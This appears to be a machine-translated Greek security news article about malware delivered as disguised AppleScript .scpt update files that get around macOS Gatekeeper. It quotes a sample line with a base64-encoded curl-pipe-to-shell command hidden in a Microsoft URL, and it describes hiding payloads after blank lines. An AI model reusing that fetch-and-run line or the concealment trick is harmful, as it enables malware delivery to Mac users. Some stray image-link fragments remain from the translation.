Οι φορείς απειλών συνεχίζουν να εξελίσσουν τις τεχνικές τους για την παράκαμψη των ελέγχων ασφαλείας του macOS, απομακρυνόμενοι από τους παραδοσιακούς φορείς επίθεσης που η Apple έχει επιδιορθώσει συστηματικά.
Μετά την κατάργηση από την Apple της παράκαμψης “δεξί κλικ και ανοίξτε” Gatekeeper τον Αύγουστο του 2024, οι επιτιθέμενοι εντόπισαν και όπλισαν έναν νέο μηχανισμό παράδοσης χρησιμοποιώντας μεταγλωττισμένα αρχεία AppleScript με παραπλανητικές συμβάσεις ονομασίας.
Αυτά τα αρχεία.
Η αναδυόμενη απειλή επικεντρώνεται σε αρχεία .scpt που ανοίγουν απευθείας στο Script Editor.app από προεπιλογή, δημιουργώντας μια ελκυστική επιφάνεια επίθεσης για τους παράγοντες απειλών.
Όταν οι χρήστες κάνουν διπλό κλικ σε αυτά τα αρχεία, η εφαρμογή εμφανίζει μια φιλική προς το χρήστη διεπαφή με ζητήματα κοινωνικής μηχανικής που ενθαρρύνουν την εκτέλεση.
Οι χειριστές κακόβουλου λογισμικού ενσωματώνουν στρατηγικά κακόβουλο κώδικα μετά από εκτεταμένες κενές γραμμές για να κρύψουν το πραγματικό ωφέλιμο φορτίο από την περιστασιακή επιθεώρηση.
Κάνοντας απλώς κλικ στο κουμπί “Εκτέλεση” ή πατώντας Cmd+R, οι χρήστες εκτελούν ακούσια το σενάριο, ακόμη κι αν έχει επισημανθεί από τα προστατευτικά καραντίνας του Gatekeeper, παρακάμπτοντας ουσιαστικά τους μηχανισμούς ασφαλείας της Apple.
.webp.jpeg)
Αναλυτές ασφαλείας στα Moonlock Labs και Pepe Berba αναγνωρισθείς Αυτή η τεχνική κερδίζει εξέχουσα θέση τους τελευταίους μήνες, ανακαλύπτοντας εξελιγμένες εκστρατείες που εμφανίζονταν στο παρελθόν σε προηγμένες επιχειρήσεις επίμονης απειλής.
Ο Pepe Berba σημείωσε ότι ενώ τα ίδια τα αρχεία AppleScript δεν είναι καινούργια, ο πολλαπλασιασμός των δειγμάτων που χρησιμοποιούν αυτήν την τεχνική αντιπροσωπεύει μια ανησυχητική τάση, ιδιαίτερα καθώς οι οικογένειες κακόβουλου λογισμικού εμπορευμάτων όπως το MacSync Stealer και το Odyssey Stealer έχουν υιοθετήσει τη μεθοδολογία.
Αυτό αντιπροσωπεύει μια κλασική περίπτωση προηγμένων τεχνικών που κυλούν από φορείς που χρηματοδοτούνται από το κράτος σε κοινές επιχειρήσεις εγκληματικότητας στον κυβερνοχώρο.
Τεχνική δομή
Η τεχνική δομή αυτών των σεναρίων χρησιμοποιεί αρκετές έξυπνες τακτικές εξαπάτησης.
Ένα δείγμα που αναλύθηκε αποκαλύπτει κώδικα AppleScript όπως π.χ set teamsSDKURL to "https://learn.microsoft.com/en-us/microsoftteams/platform/?v=Y3VybCAtc0wgYXVici5pby94LnNoIHwgc2ggLXY=" ακολουθούμενη από do shell script "open -g " & quoted form of teamsSDKURL.
.webp.jpeg)
Αυτή η δομή εντολών ανοίγει κακόβουλες διευθύνσεις URL στο παρασκήνιο, ενώ παρουσιάζει στον χρήστη προτροπές ενημέρωσης με νόμιμη εμφάνιση.
Τα ίδια τα ονόματα αρχείων χρησιμεύουν ως το κύριο επίπεδο παραπλάνησης, με παραλλαγές που περιλαμβάνουν τα “MSTeamsUpdate.scpt”, “Zoom SDK Update.scpt” και “Microsoft.TeamsSDK.scpt”.
Η εμμονή και οι δυνατότητες αποφυγής εντοπισμού αυτών των επιθέσεων αξίζουν ιδιαίτερης προσοχής.
Πολλά αρχεία .scpt διατηρούν επί του παρόντος μηδενικές ανιχνεύσεις στο VirusTotal, παρέχοντας στους εισβολείς σημαντικό λειτουργικό διάδρομο προτού οι προμηθευτές ασφαλείας εφαρμόσουν υπογραφές ανίχνευσης.
Τα αρχεία φτάνουν συχνά μέσω email ηλεκτρονικού ψαρέματος ή παραβιασμένους ιστότοπους που προσφέρουν ενημερώσεις λογισμικού, στοχεύοντας χρήστες που αναζητούν νόμιμες αναβαθμίσεις εκδόσεων.
Αυτός ο φορέας επίθεσης παρουσιάζει μια σημαντική πρόκληση για την ασφάλεια του macOS, καθώς εκμεταλλεύεται την εμπιστοσύνη των χρηστών σε γνωστά ονόματα εφαρμογών, ενώ αξιοποιεί εγγενή εργαλεία συστήματος με τα οποία αλληλεπιδρούν τακτικά οι νόμιμοι χρήστες.
Οι οργανισμοί πρέπει να εκπαιδεύουν τους χρήστες σχετικά με την επαλήθευση ενημερώσεων λογισμικού μέσω επίσημων καναλιών και να εφαρμόζουν λύσεις ανίχνευσης τελικών σημείων ικανών να παρακολουθούν μοτίβα εκτέλεσης AppleScript.
